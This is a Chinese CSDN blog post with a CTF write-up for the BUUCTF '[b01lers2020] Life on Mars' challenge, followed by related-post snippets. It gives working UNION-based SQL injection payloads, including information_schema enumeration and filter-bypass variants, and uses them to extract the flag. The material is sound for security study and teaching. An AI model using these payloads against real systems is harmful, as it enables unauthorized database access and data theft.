[b01lers2020]Life on Mars

最新推荐文章于 2022-11-21 16:57:33 发布
最新推荐文章于 2022-11-21 16:57:33 发布
阅读量159 收藏
点赞数
分类专栏: BUUCTF 文章标签: 联合注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/124157126
版权 
知识点:sql联合注入

抓包,可以看到有search参数
在这里插入图片描述
当查询的正确则返回一大堆json数据
在这里插入图片描述
输错了则返回1
在这里插入图片描述
经测试,可以order by,可以测出有2列
在这里插入图片描述
有回显,那么就不需要盲注了。
在这里插入图片描述
爆库

/query?search=chryse_planitia union select 1,group_concat(schema_name) from information_schema.schemata;#

在这里插入图片描述
爆表

/query?search=chryse_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema="alien_code";#

在这里插入图片描述
爆字段

/query?search=chryse_planitia union select 1,group_concat(column_name) from information_schema.columns where table_schema="alien_code" and table_name="code";#

在这里插入图片描述
获得flag

/query?search=chryse_planitia union select 1,group_concat(code) from alien_code.code;#

在这里插入图片描述

succ3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
b01lers-ctf-2020:b01lers-ctf的公开发布文件
05-17
b01lers-ctf b01lers-ctf的公开发布文件。 您将找到以下目录: rev:Rev的挑战 pwn:Pwn挑战 加密:加密挑战 网络:网络挑战 杂项:其他挑战 分布式文件:我们在CTF期间分发供下载的tgz文件 以及比赛的比分牌。 ...
FZHei-B01.zip
05-13
"FZHei-B01.zip"这个压缩包文件提供了一款名为"FZHei-B01"的字体,专为Windows操作系统下的LaTeX环境设计。这款字体是方正黑体系列的一部分,具有清晰、简洁的黑体风格,适用于各种文档和图形的排版。 LaTeX是一种...
[b01lers2020]Life on Mars (难发现的sql注入
最新发布
qq_62046696的博客
11-21 566
打开界面以后,查看各种都没有提示,果断扫描目录,但也是没获得什么。到这里只能burp抓个包看看 抓包两个界面发现了get传参,考虑是否存在sql注入尝试额以后发现只返回了一个1,试一下别的引号闭合 直接进行查询所有的数据库名 看一下alien_code数据库 发现code表 ?search=hesperia_planum/**/union/**/select/**/group_concat(id),group_concat(code)/**/from/**/alien_code.cod
电子水墨屏ALFG0290B01
11-30
电子水墨屏ALFG0290B01的规格书,里面详细介绍了屏的使用和尺寸
otp_win64_R15B01.rar
08-13
标题中的"otp_win64_R15B01.rar"是一个RAR格式的压缩文件,它包含的是OTP(Open Telecom Platform)在Windows 64位操作系统上的版本R15B01。OTP是Ericsson公司开发的一个开源软件框架,主要用于构建可靠、可扩展和...
otp_win32_R15B01.rar
08-13
标题中的"otp_win32_R15B01.rar"是一个RAR格式的压缩文件,它包含了一个名为"otp_win32_R15B01"的程序或软件包。OTP,全称是“One-Time Password”,通常指的是在安全领域中使用的一次性密码技术,用于增强账户的...
BUUCTF--[b01lers2020]Life on Mars
qq_46263951的博客
07-22 464
进入页面后什么也没发现,通过抓包看到一个可以参数 跟着参数走可以看到一个这样的页面 看大佬的wp接下来使用联合查询进行探测 当查询两个字段时可以正常显示 /query?search=amazonis_planitia union select 1,2 使用sqlmap扫描 扫描到这几个库,看名字应该是在alien_code中 扫描该库的表 扫描该表的列名 然后使用sqlmap --dump 不出来内容,只好手动 成功获得flag...
BUUCTF-[b01lers2020]Life on Mars
qq_24033605的博客
11-04 2937
[b01lers2020]Life on Mars 审视了一下页面的功能,这几个功能键只能改变页面显示,连跳转都没有。扫描了一下,没有其他任何页面。这是猜想是不是框架漏洞。 利用了Bootstrap的漏洞也没用,只能抓包看一下,不抓不知道,一抓吓一跳 找到了sql注入注入点,测试了一下,似乎存在waf,不能有空格,于是常规用/**/替换空格。 爆破数据库名 union/**/select/**/1,group_concat(SCHEMA_NAME)/**/from/**/information_s
BUUCTF:[b01lers2020]Life on Mars
末初的CSDN博客
08-01 2056
题目地址:https://buuoj.cn/challenges#[b01lers2020]Life%20on%20Mars 一个关于火星生命的科普站,目录扫描啥都没发现,用burp抓两个包分析一下,发现几个可疑传参 /query?search=如果地名输入正确,发现返回如下 order by判断字段,2字段时回显正确 union联合查询:/query?search=amazonis_planitia union select 111,222 回显点如图所示: 查库:/query?search=a
[b01lers2020]Life on Mars WRITE UP
Swee
09-21 433
拿到网站没啥好说的,基本是静态的页面,先抓包。 发现包有问题,search参数 非常的奇怪 经初步判定有SQL注入 ORDER BY 2 得到 有两个参数 进行联合查询,得到所有数据库的名称 发现有个贼奇怪的 叫alien_code 进去看看 /query?search=amazonis_planitia%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_sc
BUUCTF__[b01lers2020]Life on Mars_题解
风过江南乱的博客
05-06 706
BUUCTF [b01lers2020]Life on Mars sql联合注入
BUUCTF [b01lers2020] Scrambled
Senimo
01-13 699
BUUCTF [b01lers2020] Scrambled 考点: Cookie脑洞题 Python脚本编写 启动环境: 调用了一个youtube的视频,首先对题目进行信息收集,敏感目录、输入点、提示点都无发现 只有底部有一个Reload按钮,查看请求头信息,其中在Response中发现可疑的Cookie: 其中:Set-Cookie: transmissions=kxkxkxkxsh5c32kxkxkxkxsh; 刷新了几次,其中间内容变动,左右两侧kxkxkxkxsh均无变动,可疑点研究了很久
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值